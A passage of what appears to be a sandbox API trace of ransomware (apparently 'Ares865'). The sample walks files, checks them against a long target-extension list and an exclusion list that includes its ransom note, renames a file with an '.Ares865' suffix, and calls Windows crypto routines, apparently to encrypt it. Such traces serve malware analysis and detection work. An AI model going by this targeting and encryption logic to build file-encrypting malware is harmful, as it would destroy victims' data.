(lpString1="jpg", lpString2="eco") returned 1 [0063.552] lstrlenW (lpString="ecx") returned 3 [0063.552] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0063.552] lstrlenW (lpString="edb") returned 3 [0063.552] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0063.552] lstrlenW (lpString="epim") returned 4 [0063.552] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0063.552] lstrlenW (lpString="fcd") returned 3 [0063.552] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0063.552] lstrlenW (lpString="fdb") returned 3 [0063.552] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0063.553] lstrlenW (lpString="fic") returned 3 [0063.553] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0063.553] lstrlenW (lpString="flexolibrary") returned 12 [0063.553] lstrcmpiW (lpString1="eCircles.jpg", lpString2="flexolibrary") returned -1 [0063.553] lstrlenW (lpString="fm5") returned 3 [0063.553] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0063.553] lstrlenW (lpString="fmp") returned 3 [0063.553] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0063.553] lstrlenW (lpString="fmp12") returned 5 [0063.553] lstrcmpiW (lpString1="s.jpg", lpString2="fmp12") returned 1 [0063.553] lstrlenW (lpString="fmpsl") returned 5 [0063.553] lstrcmpiW (lpString1="s.jpg", lpString2="fmpsl") returned 1 [0063.553] lstrlenW (lpString="fol") returned 3 [0063.553] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0063.553] lstrlenW (lpString="fp3") returned 3 [0063.553] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0063.553] lstrlenW (lpString="fp4") returned 3 [0063.553] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0063.553] lstrlenW (lpString="fp5") returned 3 [0063.553] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0063.553] lstrlenW (lpString="fp7") returned 3 [0063.553] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0063.553] lstrlenW (lpString="fpt") returned 3 [0063.553] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0063.553] lstrlenW (lpString="frm") returned 3 [0063.553] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0063.553] lstrlenW (lpString="gdb") returned 3 [0063.553] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.553] lstrlenW (lpString="gdb") returned 3 [0063.553] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.553] lstrlenW (lpString="grdb") returned 4 [0063.553] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0063.553] lstrlenW (lpString="gwi") returned 3 [0063.553] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0063.553] lstrlenW (lpString="hdb") returned 3 [0063.553] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0063.553] lstrlenW (lpString="his") returned 3 [0063.554] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0063.554] lstrlenW (lpString="ib") returned 2 [0063.554] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0063.554] lstrlenW (lpString="idb") returned 3 [0063.554] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0063.554] lstrlenW (lpString="ihx") returned 3 [0063.554] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0063.554] lstrlenW (lpString="itdb") returned 4 [0063.554] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0063.554] lstrlenW (lpString="itw") returned 3 [0063.554] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0063.554] lstrlenW (lpString="jet") returned 3 [0063.554] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0063.554] lstrlenW (lpString="jtx") returned 3 [0063.554] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0063.554] lstrlenW (lpString="kdb") returned 3 [0063.554] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0063.554] lstrlenW (lpString="kexi") returned 4 [0063.554] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0063.554] lstrlenW (lpString="kexic") returned 5 [0063.554] lstrcmpiW (lpString1="s.jpg", lpString2="kexic") returned 1 [0063.554] lstrlenW (lpString="kexis") returned 5 [0063.554] lstrcmpiW (lpString1="s.jpg", lpString2="kexis") returned 1 [0063.554] lstrlenW (lpString="lgc") returned 3 [0063.554] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0063.554] lstrlenW (lpString="lwx") returned 3 [0063.554] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0063.554] lstrlenW (lpString="maf") returned 3 [0063.554] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0063.554] lstrlenW (lpString="maq") returned 3 [0063.554] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0063.554] lstrlenW (lpString="mar") returned 3 [0063.554] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0063.554] lstrlenW (lpString="marshal") returned 7 [0063.554] lstrcmpiW (lpString1="les.jpg", lpString2="marshal") returned -1 [0063.554] lstrlenW (lpString="mas") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0063.555] lstrlenW (lpString="mav") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0063.555] lstrlenW (lpString="maw") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0063.555] lstrlenW (lpString="mdbhtml") returned 7 [0063.555] lstrcmpiW (lpString1="les.jpg", lpString2="mdbhtml") returned -1 [0063.555] lstrlenW (lpString="mdn") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0063.555] lstrlenW (lpString="mdt") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0063.555] lstrlenW (lpString="mfd") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0063.555] lstrlenW (lpString="mpd") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0063.555] lstrlenW (lpString="mrg") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0063.555] lstrlenW (lpString="mud") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0063.555] lstrlenW (lpString="mwb") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0063.555] lstrlenW (lpString="myd") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0063.555] lstrlenW (lpString="ndf") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0063.555] lstrlenW (lpString="nnt") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0063.555] lstrlenW (lpString="nrmlib") returned 6 [0063.555] lstrcmpiW (lpString1="es.jpg", lpString2="nrmlib") returned -1 [0063.555] lstrlenW (lpString="ns2") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0063.555] lstrlenW (lpString="ns3") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0063.555] lstrlenW (lpString="ns4") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0063.555] lstrlenW (lpString="nsf") returned 3 [0063.555] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0063.555] lstrlenW (lpString="nv") returned 2 [0063.556] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0063.556] lstrlenW (lpString="nv2") returned 3 [0063.556] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0063.556] lstrlenW (lpString="nwdb") returned 4 [0063.556] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0063.556] lstrlenW (lpString="nyf") returned 3 [0063.556] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0063.556] lstrlenW (lpString="odb") returned 3 [0063.556] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.556] lstrlenW (lpString="odb") returned 3 [0063.556] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.556] lstrlenW (lpString="oqy") returned 3 [0063.556] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0063.556] lstrlenW (lpString="ora") returned 3 [0063.556] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0063.556] lstrlenW (lpString="orx") returned 3 [0063.556] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0063.556] lstrlenW (lpString="owc") returned 3 [0063.556] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0063.556] lstrlenW (lpString="p96") returned 3 [0063.556] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0063.556] lstrlenW (lpString="p97") returned 3 [0063.556] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0063.556] lstrlenW (lpString="pan") returned 3 [0063.556] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0063.556] lstrlenW (lpString="pdb") returned 3 [0063.556] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0063.556] lstrlenW (lpString="pdm") returned 3 [0063.556] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0063.556] lstrlenW (lpString="pnz") returned 3 [0063.556] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0063.556] lstrlenW (lpString="qry") returned 3 [0063.556] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0063.556] lstrlenW (lpString="qvd") returned 3 [0063.556] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0063.556] lstrlenW (lpString="rbf") returned 3 [0063.557] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0063.557] lstrlenW (lpString="rctd") returned 4 [0063.557] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0063.557] lstrlenW (lpString="rod") returned 3 [0063.557] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0063.557] lstrlenW (lpString="rodx") returned 4 [0063.557] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0063.557] lstrlenW (lpString="rpd") returned 3 [0063.557] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0063.557] lstrlenW (lpString="rsd") returned 3 [0063.557] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0063.557] lstrlenW (lpString="sas7bdat") returned 8 [0063.557] lstrcmpiW (lpString1="cles.jpg", lpString2="sas7bdat") returned -1 [0063.557] lstrlenW (lpString="sbf") returned 3 [0063.557] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0063.557] lstrlenW (lpString="scx") returned 3 [0063.557] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0063.557] lstrlenW (lpString="sdb") returned 3 [0063.557] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0063.557] lstrlenW (lpString="sdc") returned 3 [0063.557] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0063.557] lstrlenW (lpString="sdf") returned 3 [0063.557] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0063.557] lstrlenW (lpString="sis") returned 3 [0063.557] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0063.557] lstrlenW (lpString="spq") returned 3 [0063.557] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0063.557] lstrlenW (lpString="te") returned 2 [0063.557] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0063.557] lstrlenW (lpString="teacher") returned 7 [0063.557] lstrcmpiW (lpString1="les.jpg", lpString2="teacher") returned -1 [0063.557] lstrlenW (lpString="tmd") returned 3 [0063.557] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0063.557] lstrlenW (lpString="tps") returned 3 [0063.557] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0063.557] lstrlenW (lpString="trc") returned 3 [0063.557] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.557] lstrlenW (lpString="trc") returned 3 [0063.558] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.558] lstrlenW (lpString="trm") returned 3 [0063.558] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0063.558] lstrlenW (lpString="udb") returned 3 [0063.558] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0063.558] lstrlenW (lpString="udl") returned 3 [0063.558] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0063.558] lstrlenW (lpString="usr") returned 3 [0063.558] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0063.558] lstrlenW (lpString="v12") returned 3 [0063.558] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0063.558] lstrlenW (lpString="vis") returned 3 [0063.558] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0063.558] lstrlenW (lpString="vpd") returned 3 [0063.558] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0063.558] lstrlenW (lpString="vvv") returned 3 [0063.558] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0063.558] lstrlenW (lpString="wdb") returned 3 [0063.558] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0063.558] lstrlenW (lpString="wmdb") returned 4 [0063.558] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0063.558] lstrlenW (lpString="wrk") returned 3 [0063.558] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0063.558] lstrlenW (lpString="xdb") returned 3 [0063.558] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0063.558] lstrlenW (lpString="xld") returned 3 [0063.558] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0063.558] lstrlenW (lpString="xmlff") returned 5 [0063.558] lstrcmpiW (lpString1="s.jpg", lpString2="xmlff") returned -1 [0063.558] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.Ares865") returned 96 [0063.558] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\orangecircles.jpg.ares865"), dwFlags=0x1) returned 1 [0063.559] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\orangecircles.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.559] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6381) returned 1 [0063.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.560] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.560] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.560] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.560] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.560] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.561] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1bf0, lpName=0x0) returned 0x164 [0063.563] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1bf0) returned 0x190000 [0063.564] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.565] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.565] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.565] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.565] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0063.565] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.565] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0063.565] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.565] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.565] CloseHandle (hObject=0x164) returned 1 [0063.565] CloseHandle (hObject=0x154) returned 1 [0063.565] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.565] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.565] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.566] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x649d3c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x649d3c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xce109c99, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Peacock.htm", cAlternateFileName="")) returned 1 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2="aoldtz.exe") returned 1 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2=".") returned 1 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2="..") returned 1 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2="windows") returned -1 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2="bootmgr") returned 1 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2="temp") returned -1 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2="pagefile.sys") returned 1 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2="boot") returned 1 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2="ids.txt") returned 1 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2="ntuser.dat") returned 1 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2="perflogs") returned -1 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2="MSBuild") returned 1 [0063.566] lstrlenW (lpString="Peacock.htm") returned 11 [0063.566] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 88 [0063.566] lstrcpyW (in: lpString1=0x2cce48e, lpString2="Peacock.htm" | out: lpString1="Peacock.htm") returned="Peacock.htm" [0063.566] lstrlenW (lpString="Peacock.htm") returned 11 [0063.566] lstrlenW (lpString="Ares865") returned 7 [0063.566] lstrcmpiW (lpString1="ock.htm", lpString2="Ares865") returned 1 [0063.566] lstrlenW (lpString=".dll") returned 4 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2=".dll") returned 1 [0063.566] lstrlenW (lpString=".lnk") returned 4 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2=".lnk") returned 1 [0063.566] lstrlenW (lpString=".ini") returned 4 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2=".ini") returned 1 [0063.566] lstrlenW (lpString=".sys") returned 4 [0063.566] lstrcmpiW (lpString1="Peacock.htm", lpString2=".sys") returned 1 [0063.566] lstrlenW (lpString="Peacock.htm") returned 11 [0063.566] lstrlenW (lpString="bak") returned 3 [0063.567] lstrcmpiW (lpString1="htm", lpString2="bak") returned 1 [0063.567] lstrlenW (lpString="ba_") returned 3 [0063.567] lstrcmpiW (lpString1="htm", lpString2="ba_") returned 1 [0063.567] lstrlenW (lpString="dbb") returned 3 [0063.567] lstrcmpiW (lpString1="htm", lpString2="dbb") returned 1 [0063.567] lstrlenW (lpString="vmdk") returned 4 [0063.567] lstrcmpiW (lpString1=".htm", lpString2="vmdk") returned -1 [0063.567] lstrlenW (lpString="rar") returned 3 [0063.567] lstrcmpiW (lpString1="htm", lpString2="rar") returned -1 [0063.567] lstrlenW (lpString="zip") returned 3 [0063.567] lstrcmpiW (lpString1="htm", lpString2="zip") returned -1 [0063.567] lstrlenW (lpString="tgz") returned 3 [0063.567] lstrcmpiW (lpString1="htm", lpString2="tgz") returned -1 [0063.567] lstrlenW (lpString="vbox") returned 4 [0063.567] lstrcmpiW (lpString1=".htm", lpString2="vbox") returned -1 [0063.567] lstrlenW (lpString="vdi") returned 3 [0063.567] lstrcmpiW (lpString1="htm", lpString2="vdi") returned -1 [0063.567] lstrlenW (lpString="vhd") returned 3 [0063.567] lstrcmpiW (lpString1="htm", lpString2="vhd") returned -1 [0063.567] lstrlenW (lpString="vhdx") returned 4 [0063.567] lstrcmpiW (lpString1=".htm", lpString2="vhdx") returned -1 [0063.567] lstrlenW (lpString="avhd") returned 4 [0063.567] lstrcmpiW (lpString1=".htm", lpString2="avhd") returned -1 [0063.567] lstrlenW (lpString="db") returned 2 [0063.567] lstrcmpiW (lpString1="tm", lpString2="db") returned 1 [0063.567] lstrlenW (lpString="db2") returned 3 [0063.567] lstrcmpiW (lpString1="htm", lpString2="db2") returned 1 [0063.567] lstrlenW (lpString="db3") returned 3 [0063.567] lstrcmpiW (lpString1="htm", lpString2="db3") returned 1 [0063.567] lstrlenW (lpString="dbf") returned 3 [0063.567] lstrcmpiW (lpString1="htm", lpString2="dbf") returned 1 [0063.567] lstrlenW (lpString="mdf") returned 3 [0063.567] lstrcmpiW (lpString1="htm", lpString2="mdf") returned -1 [0063.567] lstrlenW (lpString="mdb") returned 3 [0063.567] lstrcmpiW (lpString1="htm", lpString2="mdb") returned -1 [0063.567] lstrlenW (lpString="sql") returned 3 [0063.567] lstrcmpiW (lpString1="htm", lpString2="sql") returned -1 [0063.568] lstrlenW (lpString="sqlite") returned 6 [0063.568] lstrcmpiW (lpString1="ck.htm", lpString2="sqlite") returned -1 [0063.568] lstrlenW (lpString="sqlite3") returned 7 [0063.568] lstrcmpiW (lpString1="ock.htm", lpString2="sqlite3") returned -1 [0063.568] lstrlenW (lpString="sqlitedb") returned 8 [0063.568] lstrcmpiW (lpString1="cock.htm", lpString2="sqlitedb") returned -1 [0063.568] lstrlenW (lpString="xml") returned 3 [0063.568] lstrcmpiW (lpString1="htm", lpString2="xml") returned -1 [0063.568] lstrlenW (lpString="$er") returned 3 [0063.568] lstrcmpiW (lpString1="htm", lpString2="$er") returned 1 [0063.568] lstrlenW (lpString="4dd") returned 3 [0063.568] lstrcmpiW (lpString1="htm", lpString2="4dd") returned 1 [0063.568] lstrlenW (lpString="4dl") returned 3 [0063.568] lstrcmpiW (lpString1="htm", lpString2="4dl") returned 1 [0063.568] lstrlenW (lpString="^^^") returned 3 [0063.568] lstrcmpiW (lpString1="htm", lpString2="^^^") returned 1 [0063.568] lstrlenW (lpString="abs") returned 3 [0063.568] lstrcmpiW (lpString1="htm", lpString2="abs") returned 1 [0063.568] lstrlenW (lpString="abx") returned 3 [0063.568] lstrcmpiW (lpString1="htm", lpString2="abx") returned 1 [0063.568] lstrlenW (lpString="accdb") returned 5 [0063.568] lstrcmpiW (lpString1="k.htm", lpString2="accdb") returned 1 [0063.568] lstrlenW (lpString="accdc") returned 5 [0063.568] lstrcmpiW (lpString1="k.htm", lpString2="accdc") returned 1 [0063.568] lstrlenW (lpString="accde") returned 5 [0063.568] lstrcmpiW (lpString1="k.htm", lpString2="accde") returned 1 [0063.568] lstrlenW (lpString="accdr") returned 5 [0063.568] lstrcmpiW (lpString1="k.htm", lpString2="accdr") returned 1 [0063.568] lstrlenW (lpString="accdt") returned 5 [0063.568] lstrcmpiW (lpString1="k.htm", lpString2="accdt") returned 1 [0063.568] lstrlenW (lpString="accdw") returned 5 [0063.568] lstrcmpiW (lpString1="k.htm", lpString2="accdw") returned 1 [0063.568] lstrlenW (lpString="accft") returned 5 [0063.568] lstrcmpiW (lpString1="k.htm", lpString2="accft") returned 1 [0063.568] lstrlenW (lpString="adb") returned 3 [0063.568] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.568] lstrlenW (lpString="adb") returned 3 [0063.569] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.569] lstrlenW (lpString="ade") returned 3 [0063.569] lstrcmpiW (lpString1="htm", lpString2="ade") returned 1 [0063.569] lstrlenW (lpString="adf") returned 3 [0063.569] lstrcmpiW (lpString1="htm", lpString2="adf") returned 1 [0063.569] lstrlenW (lpString="adn") returned 3 [0063.569] lstrcmpiW (lpString1="htm", lpString2="adn") returned 1 [0063.569] lstrlenW (lpString="adp") returned 3 [0063.569] lstrcmpiW (lpString1="htm", lpString2="adp") returned 1 [0063.569] lstrlenW (lpString="alf") returned 3 [0063.569] lstrcmpiW (lpString1="htm", lpString2="alf") returned 1 [0063.569] lstrlenW (lpString="ask") returned 3 [0063.569] lstrcmpiW (lpString1="htm", lpString2="ask") returned 1 [0063.569] lstrlenW (lpString="btr") returned 3 [0063.569] lstrcmpiW (lpString1="htm", lpString2="btr") returned 1 [0063.569] lstrlenW (lpString="cat") returned 3 [0063.569] lstrcmpiW (lpString1="htm", lpString2="cat") returned 1 [0063.569] lstrlenW (lpString="cdb") returned 3 [0063.569] lstrcmpiW (lpString1="htm", lpString2="cdb") returned 1 [0063.569] lstrlenW (lpString="ckp") returned 3 [0063.569] lstrcmpiW (lpString1="htm", lpString2="ckp") returned 1 [0063.569] lstrlenW (lpString="cma") returned 3 [0063.569] lstrcmpiW (lpString1="htm", lpString2="cma") returned 1 [0063.569] lstrlenW (lpString="cpd") returned 3 [0063.569] lstrcmpiW (lpString1="htm", lpString2="cpd") returned 1 [0063.569] lstrlenW (lpString="dacpac") returned 6 [0063.569] lstrcmpiW (lpString1="ck.htm", lpString2="dacpac") returned -1 [0063.569] lstrlenW (lpString="dad") returned 3 [0063.569] lstrcmpiW (lpString1="htm", lpString2="dad") returned 1 [0063.569] lstrlenW (lpString="dadiagrams") returned 10 [0063.569] lstrcmpiW (lpString1="eacock.htm", lpString2="dadiagrams") returned 1 [0063.569] lstrlenW (lpString="daschema") returned 8 [0063.569] lstrcmpiW (lpString1="cock.htm", lpString2="daschema") returned -1 [0063.569] lstrlenW (lpString="db-journal") returned 10 [0063.569] lstrcmpiW (lpString1="eacock.htm", lpString2="db-journal") returned 1 [0063.569] lstrlenW (lpString="db-shm") returned 6 [0063.569] lstrcmpiW (lpString1="ck.htm", lpString2="db-shm") returned -1 [0063.570] lstrlenW (lpString="db-wal") returned 6 [0063.570] lstrcmpiW (lpString1="ck.htm", lpString2="db-wal") returned -1 [0063.570] lstrlenW (lpString="dbc") returned 3 [0063.570] lstrcmpiW (lpString1="htm", lpString2="dbc") returned 1 [0063.570] lstrlenW (lpString="dbs") returned 3 [0063.570] lstrcmpiW (lpString1="htm", lpString2="dbs") returned 1 [0063.570] lstrlenW (lpString="dbt") returned 3 [0063.570] lstrcmpiW (lpString1="htm", lpString2="dbt") returned 1 [0063.570] lstrlenW (lpString="dbv") returned 3 [0063.570] lstrcmpiW (lpString1="htm", lpString2="dbv") returned 1 [0063.570] lstrlenW (lpString="dbx") returned 3 [0063.570] lstrcmpiW (lpString1="htm", lpString2="dbx") returned 1 [0063.570] lstrlenW (lpString="dcb") returned 3 [0063.570] lstrcmpiW 